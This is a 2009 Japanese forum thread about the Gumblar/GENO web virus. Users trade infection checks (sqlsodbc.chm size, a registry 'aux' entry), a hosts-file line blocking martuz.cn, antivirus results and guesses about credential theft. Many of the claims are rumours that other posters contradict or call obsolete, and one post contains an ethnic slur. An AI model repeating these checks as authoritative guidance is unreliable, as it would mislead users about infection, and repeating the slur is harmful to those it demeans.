それただのネタだったみたい。
376192.168.0.774:2009/05/17(日) 21:25:07 ID:61lOiijw0
まさに情報の錯綜って感じだなオイ
377192.168.0.774:2009/05/17(日) 21:25:21 ID:7TaPV4fL0
そうだったんだ。
というわけなので、まとめサイトの人修正お願いします。
378192.168.0.774:2009/05/17(日) 21:25:29 ID:4g69K7//0
あぬビスレポート見ればわかるけど
感染してて、不発だった場合
手動でcmdを実行すると火がつく可能性がある
379192.168.0.774:2009/05/17(日) 21:25:35 ID:mNi/cx+s0
>>373
怖くて踏めない…
380192.168.0.774:2009/05/17(日) 21:33:04 ID:O8ZrwtGB0
>>379
安全だってば。
スクリーンショット
ttp://www.rupan.net/uploader/download/1242563513.png
381192.168.0.774:2009/05/17(日) 21:35:16 ID:U6FqnzDc0
>>363
ここに力を貸してもらえないか聞いてみたら?

幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
382192.168.0.774:2009/05/17(日) 21:36:30 ID:M2s+iWsi0
>>379
これで何か起きた、って報告は聞かないから大丈夫w
383192.168.0.774:2009/05/17(日) 21:37:11 ID:WLY0wH0PO
>>373踏んだら感染した。
384192.168.0.774:2009/05/17(日) 21:38:33 ID:61lOiijw0
>>383
おせーよ携帯
385192.168.0.774:2009/05/17(日) 21:38:50 ID:O8ZrwtGB0
>>383
嘘はいけません。
386192.168.0.774:2009/05/17(日) 21:41:40 ID:N2pz4sCI0
なんともなかった
387192.168.0.774:2009/05/17(日) 21:55:41 ID:mNi/cx+s0
ほんとに? うう…
388192.168.0.774:2009/05/17(日) 22:01:24 ID:FwEBmaaZ0
正直ネット不慣れな俺には判別できんけど、ツール使わなくても確認はできるんだし安易に踏むべきじゃないのはわかる
389192.168.0.774:2009/05/17(日) 22:17:19 ID:xG23ce6c0
>>375
ネタだったのかよ
本当に錯綜って感じだな・・・結局大人しく暫くネットから離れてるのが正解か・・・
390192.168.0.774:2009/05/17(日) 22:18:38 ID:++vAYPLj0
>>389
cmdの起動に問題があったこともあった
いまはしらん
391192.168.0.774:2009/05/17(日) 22:19:30 ID:BvZF1aRY0
亜種・新種が多すぎだからネタとも言い切れないのが困り物
392192.168.0.774:2009/05/17(日) 22:23:00 ID:FEBrgm5Z0
どっちにしろcmd実行で火噴いても、検出しても
クリーニンスコするだけだからいんじゃね
393192.168.0.774:2009/05/17(日) 22:25:53 ID:D2jCgTYH0
気が向くたびにcmd起動させては安全を確認している俺がいる。
ニフティの公式HPが感染のデマには心底焦ったからなぁ。
394192.168.0.774:2009/05/17(日) 22:28:02 ID:FEBrgm5Z0
ニフティのレンタル鯖だっけ?
395192.168.0.774:2009/05/17(日) 22:29:58 ID:hMuH46V60
正直怖くて、閲覧できません><
一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
396192.168.0.774:2009/05/17(日) 22:30:44 ID:TTgW4pHv0
>>388
ツールつかったけど、しっかり使えたよ
山田チェッカー出たときも、こんな感じで疑心暗鬼だったのかもね
397192.168.0.774:2009/05/17(日) 22:34:01 ID:5b9h61kx0
sqlsodbc.chmのサイズが1,323
コマンドプロンプトとレジストリは開くんだけど・・・
このウィルスって感染してたら例えばどんな被害があるの?
まじ泣きそうなんだが
398192.168.0.774:2009/05/17(日) 22:37:40 ID:T9pTie3x0
>>337
okですよね、とかじゃなくて最新版に出来るならしておくもんですよ・・・
その面倒くさい精神が感染を招いてるのに不安で尚やらんってのは
他のが出てきたときにもくらかもよ
399192.168.0.774:2009/05/17(日) 22:38:11 ID:q8u6cZFi0
>>397
アウト

・ftpを介しての自サイトの改竄
・クレカ番号やID・Passの流出
・CPUの負荷の増大

ここら辺か?
クリーンインスコしてこい
400192.168.0.774:2009/05/17(日) 22:38:11 ID:BvZF1aRY0
自分のHP持ってなければ再起動した時点でPC終了、クリーンインストール以外の駆除手段無しって程度
HP持ってた場合気づかず更新するとそこがまた感染源に
401ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
402192.168.0.774:2009/05/17(日) 22:41:35 ID:sXGsF7Ez0
マジでか…
sqlsodbc.chmのサイズが変わらないって話もなかったっけ?
気のせい?デマ?

判断材料がないとかやばすぎる
403192.168.0.774:2009/05/17(日) 22:42:06 ID:7TaPV4fL0
しかし今までこの形式のウイルスが出てこなかった(のかな?)
のが不思議なのかもしれないね。
404192.168.0.774:2009/05/17(日) 22:44:36 ID:5b9h61kx0
>>399
>>400
ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
405401:2009/05/17(日) 22:47:19 ID:N9SKEU4J0
>>397
>401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。

可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...


私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。

# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
 多分、何やっても検知できない。
406192.168.0.774:2009/05/17(日) 22:48:32 ID:Zy7kEHYt0
初歩的な質問で申し訳ないのですが……
ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を
書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に
並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって
書き込んだ方がいいのでしょうか?
407192.168.0.774:2009/05/17(日) 22:48:54 ID:FwEBmaaZ0
>>404
windows updateに繋がらないって時点でアウトだろ・・・
408192.168.0.774:2009/05/17(日) 22:49:01 ID:IyeP3TLN0
u.bat 今はe.batか。こいつは去年の秋ぐらいからあるみたい
readerの脆弱性指摘も去年の秋だったかな
genoウイルス感染報告は海外で今年3/18ぐらいだったかな
ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
409192.168.0.774:2009/05/17(日) 22:49:10 ID:++vAYPLj0
>>402
あったきがする
>>404
オンラインでIDパスワードを使うサービスを使用しているなら
クリーンインストール後に変更推奨
他に安全なPCがあるならそちらからすぐにでも変更推奨
410192.168.0.774:2009/05/17(日) 22:51:04 ID:IyeP3TLN0
190 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/17(日) 01:51:35
>>178
>sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。

ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば

あいうえお



おえういあ

って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
411192.168.0.774:2009/05/17(日) 22:51:08 ID:sXGsF7Ez0
>>409
じゃあ感染しててもまったくわからないこともあるってことか…
鬱陶しいってレベルじゃねーぞこれ
412192.168.0.774:2009/05/17(日) 22:52:46 ID:IyeP3TLN0
感染してからsqlsodbc.chmをメモ帳を開けば面白いものが見れるのか?
413192.168.0.774:2009/05/17(日) 22:52:58 ID:FSY0bnP50
うっとおしさっていう点では、ここ数年稀に見るウイルスだな
414274:2009/05/17(日) 22:53:26 ID:7UVnacRX0
うっひょう、カスペなんかもダメなのか。
さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。

>1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
415192.168.0.774:2009/05/17(日) 22:53:45 ID:mpI/NNW20
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png
416192.168.0.774:2009/05/17(日) 22:53:59 ID:rsd1W3Tn0
>>401
明らかに目立った不具合とかはありますか?
417192.168.0.774:2009/05/17(日) 22:55:53 ID:++vAYPLj0
>>411
サイズがかわるかどうか怪しいからMD5とか確認しようって流れだった
いまはしらん
418192.168.0.774:2009/05/17(日) 22:56:16 ID:sDfaXn0wO
>>401
横レスですみませんが、
つまり、ttp://wepawet.cs.ucsb.edu/index.php
などでソースを見たとき、martuz.cnやgumblar.cnが無くても感染の疑いがあるという事ですか?
419192.168.0.774:2009/05/17(日) 22:59:44 ID:1tk6kEt+0
>>418
なんでそうなるん?
420192.168.0.774:2009/05/17(日) 23:04:10 ID:vIxScWxq0
chmがキーロガーのログ部分なのか?
ちょっくらVMで感染してくるか。
421192.168.0.774:2009/05/17(日) 23:05:11 ID:QXwoDhGF0
ぷりんてぃんがGENOに汚染
422192.168.0.774:2009/05/17(日) 23:05:49 ID:sXGsF7Ez0
感染者がサイト持ってた場合、サイトが書き換わるのは確実
それ以外の症状は出るか不明
感染がわからないこともあるかも

CPU使用率とか目安にならない?
423192.168.0.774:2009/05/17(日) 23:05:50 ID:1tk6kEt+0
>>420
キーロガーじゃなくてsniffingしてる。
424401:2009/05/17(日) 23:06:07 ID:N9SKEU4J0
>>410
キーロガーのログなのかなぁ...私が確保したファイルは、中身思いっきり無意味な文字列だった。
何か暗号化されてるのか、それとも仮想PCで何も入っていないから無意味な文字列になったのか。

あと、マイクロソフトのOncareオンラインスキャン終わった。

...微妙。これ、レポートが出力されないから詳細がわからなすぎる。とりあえず、

1.展開された後のウイルス本体ファイルは削除された。(>401で、muvl.nugの方)
  http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1aで
  MicrosoftがTrojan:Win32/Daonol.Dとして本体検出したので、行けるか?とおもったけど、
  一応潜伏後の本体を捕まえそう。(絶対ではないと思うけど。)

2.レジストリの方に登録されたauxのマルウェア実行登録は、そのまま残っている。

少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)

一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm
425192.168.0.774:2009/05/17(日) 23:08:41 ID:vIxScWxq0
>>423
盗聴?それだと俺なんかじゃ中身みるのは難しそうだな
426192.168.0.774:2009/05/17(日) 23:11:13 ID:0KCBdJWL0
sniffingしてるとして、どこに送ってるんだろ?
やっぱりmartuz.cn?
427192.168.0.774:2009/05/17(日) 23:13:17 ID:1a+FrLCg0
>>423
それだとここ最近多発してるオンラインゲームのアカウントハックはコイツが犯人の可能性が濃厚だな。
428192.168.0.774:2009/05/17(日) 23:16:12 ID:++vAYPLj0
>>427
Genoさんとは別物です
429192.168.0.774:2009/05/17(日) 23:18:28 ID:vIxScWxq0
>>427
あれは中華やチョンのマルウェア仕込んだサイトじゃなかったか
430192.168.0.774:2009/05/17(日) 23:19:29 ID:SfYViNhDO
あーやばいなー
今PCおとして携帯でレスしてるんだけど今日エクスプローラ二回おちてフリーズも二回したからなー

感染してるかもしんねー
431192.168.0.774:2009/05/17(日) 23:25:36 ID:1a+FrLCg0
>>429
それにしちゃ薄く広いのが気になる。
FF11、RO、リネ2くらいのメジャーなのはともかく、マビノギやグラナド、MoEとかのマイナーゲーでも被害が出てる。
(ルナティア、完美世界は運営の失態なので除外)
432192.168.0.774:2009/05/17(日) 23:26:13 ID:vIxScWxq0
>>420
報告、俺も>>424だった。意味不。
433401:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。


これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
434192.168.0.774:2009/05/17(日) 23:28:07 ID:D2jCgTYH0
sqlsodbc.chmって、ヘルプファイルですよね?
なんでそんなとこの容量増やすんですか、このウィルス。
ヘルプの項目に嘘八百を追加するんですか?
435401:2009/05/17(日) 23:28:50 ID:N9SKEU4J0
>>433
>確認は、sqlsodbc.exeだけが頼りですね。

exeじゃねえ... sqlsodbc.chm ですな。
436401:2009/05/17(日) 23:30:13 ID:N9SKEU4J0
>>434
容量を増やしているのではなく、何かに使っているらしい。

書き換えられた後のファイルは、ヘルプファイルとしては壊れた状態で使い物にならない。
437192.168.0.774:2009/05/17(日) 23:31:12 ID:FSY0bnP50
>>424
あくまで推測だけど、サイト書き換えようのFTPのアカウントとキーとアドレス情報の格納場所じゃないかと思う。
chmファイルのサイズが一定しないっていう情報を4月騒動の頃にまとめサイトで見たことがあるんだが、
それは、他の感染PCとキー情報のやり取りをして、情報が増えて行ってるからではないかと思う。
で、他の感染PCと一切交換を行っていない初期サイズが1323バイトとか。

もし、感染した人の中に、chmファイルのサイズが時とともに増加していったっていう情報があれば、その線を疑えると思う。
438192.168.0.774:2009/05/17(日) 23:31:27 ID:++vAYPLj0
>>431
RMTができれば日本での認知度なんて気にしてないのかもね
客がいれば利益は出るわけだしどのゲームでもやることは同じだし投資は少ないし
特定のターゲットにしぼるより広くやったほうがどれかが潰れても
被害を抑えられるかな
439192.168.0.774:2009/05/17(日) 23:33:53 ID:0KCBdJWL0
>>433
そこまで潜伏できるのにわざわざ明確な印残す意味が分からんなぁ>sqlsodbc.chm

あ、もしかしてsqlsodbc.chmを読み取り属性にしておくと拙いかな、これ?
440ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
441192.168.0.774:2009/05/17(日) 23:35:15 ID:FSY0bnP50
>>437の補足として、ウイルスを駆除したにも関わらず、FTPパスを変えてなかったら、
自サイトをウイルス誘導ページに書き換えられたっていう報告があるらしい。

そのため、感染PC同士でFTPアカウント情報のやり取りをしており、
どこかに保存しているっていう観点からそう推理してみた。
442192.168.0.774:2009/05/17(日) 23:36:01 ID:MP/sWvjo0
ただいま。

>>434>ヘルプの項目に嘘八百を追加するんですか?
かなりの危険をおかしてまで、たったそれだけの無意味なウイルスは作らないと思うがw
sqlsodbc.chm自体が書き換わったら容量変わるだろ?

じゃあ、おやすみなさい。
443192.168.0.774:2009/05/17(日) 23:36:19 ID:vIxScWxq0
初期スレからいるが、f639という文字列を見る度に感じるホッという安心感はなんなんだろう
俺だけか
444192.168.0.774:2009/05/17(日) 23:36:31 ID:0H7sjBwe0
とりあえずsqlsodbc.chmの更新日時は一年前になってるからOKですよね?
445192.168.0.774:2009/05/17(日) 23:37:21 ID:q8u6cZFi0
>>444
サイズも要確認
446401:2009/05/17(日) 23:37:40 ID:N9SKEU4J0
>>418
ソース見ただけでは感染しないよ。(苦笑

逆に、自分がサイトの管理者であった場合なら、自分が管理しているサイトに異常が無くても
感染している可能性はある。 これは、今の所

・sqlsodbc.chm のサイズを確認。→1,323バイトとか、ファイルが異常に小さくなっていたら確実にアウト

・ダブルクリックして、ヘルプファイルとして開けるか? → ダブルクリックして『壊れている』と表示されたらヤバイ。
 → sqlsodbc.chmをワードパッドなどで開いてみる。ファイルが開けて、中身がテキストデータに置き換わっていたらアウト。

ぐらいしか確認の方法が無い。 cmd.exeとレジストリエディタによる確認方法は、忘れた方が良い。


さて、危ないから感染した仮想PCはゴミ箱行きにします。
447192.168.0.774:2009/05/17(日) 23:37:48 ID:qCuFPmlW0
感染してるか気になって自分も調べたんですけど
XP SP3 でsqlsodbc.chm が無かった
nliteで削ったりしたからだと思うけど。
448192.168.0.774:2009/05/17(日) 23:39:32 ID:OKDvuiXi0
>>447
2000で無い場合に作られるから多分XPでも挙動は同じじゃね?
449192.168.0.774:2009/05/17(日) 23:40:56 ID:qCuFPmlW0
>>448
ですよね。
とりあえず一安心。
アップデートにも繋がりますし。
450192.168.0.774:2009/05/17(日) 23:44:02 ID:++vAYPLj0
chmは操作かく乱用のダミーっぽいとのこと
ソースは検出可否報告スレ
451192.168.0.774:2009/05/17(日) 23:44:06 ID:j/5AZ8AK0
>>440
現在感染なし
MD5値同じでした
452192.168.0.774:2009/05/17(日) 23:44:47 ID:rsd1W3Tn0
>>433
ありがとう。やっぱりもう重いだとかcmdが開かないとかそんな確認方法は無駄かも「しれない」のね。
sqlsodbc.chmの他にHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の様子はどうですか?
453192.168.0.774:2009/05/17(日) 23:45:12 ID:NJZAyhdU0
つか無料鯖で捨て垢作ってftpで適当なhtmlファイル上げてみてソース確認すれば感染確認できるやないかえ
454192.168.0.774:2009/05/17(日) 23:56:05 ID:kVP/8H1t0
ジェノチェッカーで、俺のPC(VISTA)のsqlsodbc.chmのサイズが46,133で感染の疑いが有るっていうんで、

■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

を実行したら最終更新日が2006年11月……
これは、どれを信じりゃいいのかわからなくなってきたんだが。
455192.168.0.774:2009/05/17(日) 23:59:16 ID:jG2pcMw10
とりあえずAdobeのFlashとReaderを最新にするなりアンインストールしとけば平気ですか?
456401:2009/05/17(日) 23:59:33 ID:N9SKEU4J0
>>450
いや、それ私。(苦笑

ダミーと書いた方が先で、ロガーのデータという話の方が後。
この辺は、流石に自分で通信をあっちに傍受させる気はないんで、こちらでは確認はちょっと難しい。
457192.168.0.774:2009/05/18(月) 00:02:47 ID:kVP/8H1t0
>>446
vistaでジェノチェッカーを使用し、ファイルサイズが違うので感染の疑いが濃厚です。
と、出たのだが401さんの言うようにヘルプファイルで開けるし、最終更新日は遙か前だわ。


こうなるとジェノチェッカーで感染したと思いこんじゃう人が出てくるんじゃないだろうか…
458192.168.0.774:2009/05/18(月) 00:02:52 ID:xqkDEgVB0
このGENOって何の為のウィルスかは未だ良く分かってないんですよね?
オマケに感染したのかを2chとかで知って確認した人ぐらいしか自覚が無いらしいし…

新型インフルでは無いけどこれから爆発的に被害出そうで気味悪いなぁ
459401:2009/05/18(月) 00:03:53 ID:N9SKEU4J0
>>452
そこは今まで通り、auxとして登録されるのを確認してあります。>424の2番の所ですね。
詳しい人なら、そこを押さえるのが一番でしょう。 レジストリを確認しにくければ、やはりsqlsodbc.chmのサイズと中身かな。

cmd.exeとレジストリエディタは、あちらが改良したからには、今後のバージョンも使えないと思った方が良いかと。
460192.168.0.774:2009/05/18(月) 00:04:48 ID:vIxScWxq0
あーなんか勝手にドライバ作ってんのね
461192.168.0.774:2009/05/18(月) 00:06:03 ID:FSY0bnP50
なんか、ウイルス作者がこのスレ見て次verの対策練ってたらやだなぁ
462192.168.0.774:2009/05/18(月) 00:08:40 ID:j6rZXl7R0
>>459
今のところauxに痕跡は残しますか
折角regeditを起動させるようにしたみたいだし、レジストリを監視するのも面倒臭くなりそうだなあ
463192.168.0.774:2009/05/18(月) 00:08:43 ID:uebw+uxF0
とりあえず、初心者にわかりやすい説明としてはsqlsodbc.chmをダブクリで開いてみて、
エラーが出ないでヘルプファイルが開けたらセーフとかにしたほうが混乱が少なくていいんじゃマイカ?
464192.168.0.774:2009/05/18(月) 00:09:39 ID:RYc+mlfs0
sqlsodbc.chmのショートカットデスクトップに置いとくか
465192.168.0.774:2009/05/18(月) 00:12:57 ID:H93VbD2h0
>>463
なるほど
分かり易いですサンクス
466192.168.0.774:2009/05/18(月) 00:16:49 ID:r6TpwBf70
>>461
こわいこというなよ
467192.168.0.774:2009/05/18(月) 00:23:11 ID:kK4DaAw60
>>352
自分もはまりました。
RPC と 「有効なデバイスが関連づけられていない」で検索

http://ziddy.japan.zdnet.com/qa3068747.html
こちらに書かれていた情報で直りました。
468192.168.0.774:2009/05/18(月) 00:26:33 ID:SGBG03gk0
>>456
ごめん><
469192.168.0.774:2009/05/18(月) 00:29:04 ID:uebw+uxF0
これって世界規模ではどんな感じで広がってるんだろうか。

あと質問なんだけれど、sqlsodbc.chmって開くと日本語でヘルプファイルが出てくる?

だったら、ジェノチェッカーでサイズの違いで感染に引っかかったというコメントが出る原因がわかるんだが。
もしそうなら俺がドイツ語版vistaを使っているからということで説明がつく。
470192.168.0.774:2009/05/18(月) 00:31:26 ID:yv43KHe00
>>469
日本語だね

>>111のITMedia見る限りでは全世界規模で広がってると考えてよさそう
471192.168.0.774:2009/05/18(月) 00:31:28 ID:+m52NSIq0
今Microsoft Updateをしようとしたら、エラー番号: 0x80072EFDが出て
できませんでした。OSはXP SP3です。
472192.168.0.774:2009/05/18(月) 00:32:17 ID:TQZo9UtD0
>>469
ドイツで多少出ているようです
後でレス探してみます
sqlsodbc.chmはヘルプが出ます
逆に出ないときは感染濃厚ということです
473192.168.0.774:2009/05/18(月) 00:35:35 ID:/YAiDTNe0
いつも思うんだけどさ。

こういう2ちゃんみたいな低俗な掲示板で、頑張ってウイルスと
戦うお前らって、

勇者だよね。


・・・ただのヒマ人?またまた御冗談を。
474192.168.0.774:2009/05/18(月) 00:35:42 ID:uebw+uxF0
>>470
ありがとう。おかげで謎が解けた。

しかし>>457.454でジェノチェッカーの精度に疑いがあると書いてしまった……
他の人が間違えないといいが。
475192.168.0.774:2009/05/18(月) 00:36:49 ID:Jag7vYy/0
今すっごいネット重いんだけどウイルスと関係ある?
476192.168.0.774:2009/05/18(月) 00:37:32 ID:0Y431MZ/0
>>472
俺が知ってるのは
>3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
>感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
ttp://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
今現在どう進行してるのかね
477192.168.0.774:2009/05/18(月) 00:42:50 ID:uebw+uxF0
>>475
つテレホタイム
>>472
あぁ、ドイツの掲示板でも感染の装弾している所を発見。
やっぱり感染の確認方法はほとんど一緒。
やはり感染疑いのユーザーが雪崩れ込んでて、FUCK!の嵐でまともに相談できていない模様。
どこも一緒なんだなw
478192.168.0.774:2009/05/18(月) 00:47:02 ID:QCHe1qHC0
>>477
すまん、もしよければそのドイツの掲示板を
教えてはくれまいか。
479192.168.0.774:2009/05/18(月) 00:47:30 ID:EMdE+yZc0
>>461
ヒント:相手は外人

ここよりももっと有益な情報が書いてあって、しかもちゃんと纏められてる英語の掲示板見るのでここは見ません
480192.168.0.774:2009/05/18(月) 00:49:25 ID:vNF2317C0
さっきカスペルのチェックでマルウェア検出された俺涙目
今ウィルスバスターでもっかい確認中、ダメならもうだめだ
481192.168.0.774:2009/05/18(月) 00:51:52 ID:uebw+uxF0
>>478
大学とOB用の草の根BBSみたいな所だから、卒業した学生番号がいるんだが。
すまない、それ教えると俺の身元が割れちまうから勘弁してくれ。
482192.168.0.774:2009/05/18(月) 00:52:58 ID:QCHe1qHC0
>>481
承知した。ありがとう。
483192.168.0.774:2009/05/18(月) 00:57:45 ID:D1poB8XB0
作者ってマジで外人なのか
何のために・・・
484192.168.0.774:2009/05/18(月) 00:58:15 ID:+m52NSIq0
アップデートできなかったらってのは、エラー番号: 0x80072EFDがでたらと言うことですか?
それとも、Microsoft Updateのトップサイトにすらつながらない状態ですか?
485192.168.0.774:2009/05/18(月) 00:58:23 ID:0Y431MZ/0
巨大なbotnetの作成
486192.168.0.774:2009/05/18(月) 00:58:25 ID:j6rZXl7R0
金稼ぎじゃないかと言われてる
487192.168.0.774:2009/05/18(月) 01:00:58 ID:vNL6vAf4O
さっきからインターネットが繋がんないんだが…


感染したのかな?
488192.168.0.774:2009/05/18(月) 01:10:07 ID:2IEunuB80
>>483
外人の組織?で、普通に金儲けだと思うよ。
後は愉快犯とかが亜種作ってるんじゃないのかな。

国内のサイトの現状知ったらどう思うのかなー。
489192.168.0.774:2009/05/18(月) 01:15:12 ID:TTbAOLbH0
何よりこわいと思ったのが、製薬会社やらの普通の企業もやられてるのに、未だほとんどニュースとして公表されてないこと
2ch張り付いてる奴ならともかく、もう少し広まったら確実に普通にネットやってる連中のPC終わるぞ
490192.168.0.774:2009/05/18(月) 01:16:58 ID:EgqX730p0
>>489
イメージダウンになるから黙ってるんでしょ
491192.168.0.774:2009/05/18(月) 01:18:53 ID:p9Xcqg7P0
黙ってる方が後で大幅イメージダウンになるこのご時世
492192.168.0.774:2009/05/18(月) 01:23:34 ID:RCHjlpg60
>>489
ネットニュースで最近知ったが日本での発端が四月と聞いてビビッタよ
感染はしてなかったけど感染が判らないだけかも知れないのが気持ち悪い
493192.168.0.774:2009/05/18(月) 01:29:06 ID:j6rZXl7R0
アンチウイルスベンダーの対応も今一だからね…
積極的にプレスリリース出してる所も英語圏が中心でしょう
それが原因じゃないかなあ
494192.168.0.774:2009/05/18(月) 01:33:23 ID:TTbAOLbH0
個人的に一番嫌なのはカスペから乗り換えようとしてたノートン先生の今回の対応が残念すぎたこと
これでまたセキュリティを考え直さなきゃいけない
495192.168.0.774:2009/05/18(月) 01:40:51 ID:Y6ubUO900
感染の確認方法だけど、gnomeの人は初めから
sqlsodbc.chmとレジストリ値の確認だけで
cmd.exeやregeditの起動による確認方法は書いてないね

やっぱりこの人のところが一番信用できるなと思った
ニフティの件みたいに良く読まない人がデマ流したりして大変みたいだけど
これからもがんばってほしい
496192.168.0.774:2009/05/18(月) 01:44:09 ID:BzNhsWFE0
225のヤツとか逮捕の対象にならんの?
ウイルス広めるヤツは逮捕&死刑でいいでしょ。
497192.168.0.774:2009/05/18(月) 01:46:45 ID:AxgR+t010
>>496
225踏んで感染したんですか?
498192.168.0.774:2009/05/18(月) 01:51:13 ID:BzNhsWFE0
いんや。流石にリンクを踏むのが怖くてね。
後に感染したってあったから、もう少し注意が足りなかったら感染してたかも・・・
って考えるとな・・・。
499192.168.0.774:2009/05/18(月) 02:18:04 ID:zXvWG0pfO
>>489
そうだよ!何か今回おかしいよな!
まさかとは思うけど
同人誌とかアニメとかそういうのが大嫌いなやつが
このウイルスを再び蔓延させて
一気にヲタを潰そうと考えたのかもしれない
500192.168.0.774:2009/05/18(月) 02:19:28 ID:SGBG03gk0
>>499
そんなちっぽけなレベルの話じゃないです
501192.168.0.774:2009/05/18(月) 02:19:44 ID:zXvWG0pfO
>>492
何度も悪いけど
その時もあまりおおっぴらに取り上げられなかった筈
今回は何かおかしい
502192.168.0.774:2009/05/18(月) 02:28:00 ID:tHeAy9ld0
どうせ後で「GENOウイルス?あぁあんなんに騙されて大騒ぎしてた奴らなんてただの馬鹿だよww」ってことになんだろ?
503192.168.0.774:2009/05/18(月) 02:28:52 ID:z2bzI9GC0
             /^7_
.            ,' / /
           |  //ヘ
           |  /  /
       三 |   /       , ヘ
        -‐¬  {   ミ   / /
  \  /  三 L 」  ミ  /  _ ニコ     // ヽ,
.     X  /   | | ミ /  >'´        ,.└''"´ ̄ ̄   `ヽ、   キャッシュ消せばいいんだよ
.   /  / 、    | |    /  ヽ     ,. '´     、、   ヽ  ヽ
.   ,′ ,  \  | |__           ノ   ,  lヽ  j /、lヽ ト、_,,.',
  {      /´ ̄`'J        r'´ r'"イ .ノ\| .レ r=;ァ'レ'  {  }
   ―  --  {    }.         {  !、 l rr=-       /  `'''l.>‐ .、
    ‐ ―  ヽ. _人.       レヽ.,ト'     ー=‐'   /    l 、,,_,,ノ
       / /ヽl  } \.         ,}' ',          /ヘ,  /レ' ,/ >‐、
    ヽ / /ミ ノ ノ、   `      7'´レ1 ヽ             人ル'レ'   'i、_
   / / ミ (_/  \           レ〜i` ヽ 、_     ( "
504192.168.0.774:2009/05/18(月) 02:29:04 ID:4oFiJRbxO
ieから火狐に変えれば予防出来る?
てか、初心者向けのまとめサイトってないかな?
505192.168.0.774:2009/05/18(月) 02:30:38 ID:z2bzI9GC0
>>504
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF

ここまでは出来るだろ。
506192.168.0.774:2009/05/18(月) 02:30:55 ID:O4S1nyz60
少なくとも4月頃は色んな板でやたらとスレ立って祭りしてたようなイメージがあるが
逆に今回の騒ぎ様の方が違和感というか今更感があるんじゃ?
507192.168.0.774:2009/05/18(月) 02:34:46 ID:g3jcf+6w0
情弱腐女子とニコ厨大好き東方・ボーカロイド同人サイトで
急速にパンデミック起こしたからじゃね
508192.168.0.774:2009/05/18(月) 02:35:24 ID:0qo6gqNs0
実際に感染してんのはそいつらだけだろうな
509192.168.0.774:2009/05/18(月) 02:36:14 ID:tHeAy9ld0
707 名前:GENO[sage] 投稿日:2009/05/18(月) 02:31:35 ID:93Cm5lq90
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われる

709 名前:GENO[sage] 投稿日:2009/05/18(月) 02:33:00 ID:9UIQFr160
>>707
なるへそ、だから同人で感染爆発してるのか
510192.168.0.774:2009/05/18(月) 02:36:32 ID:9OAY1try0
まぁ四月の時はGENOのサイト行ってない奴は他人事で済まされたからな
いや、実際済まなかったんだけどさ
511192.168.0.774:2009/05/18(月) 02:36:54 ID:PGXf1oVHO
夏コミが近いというのに
まったくもう!
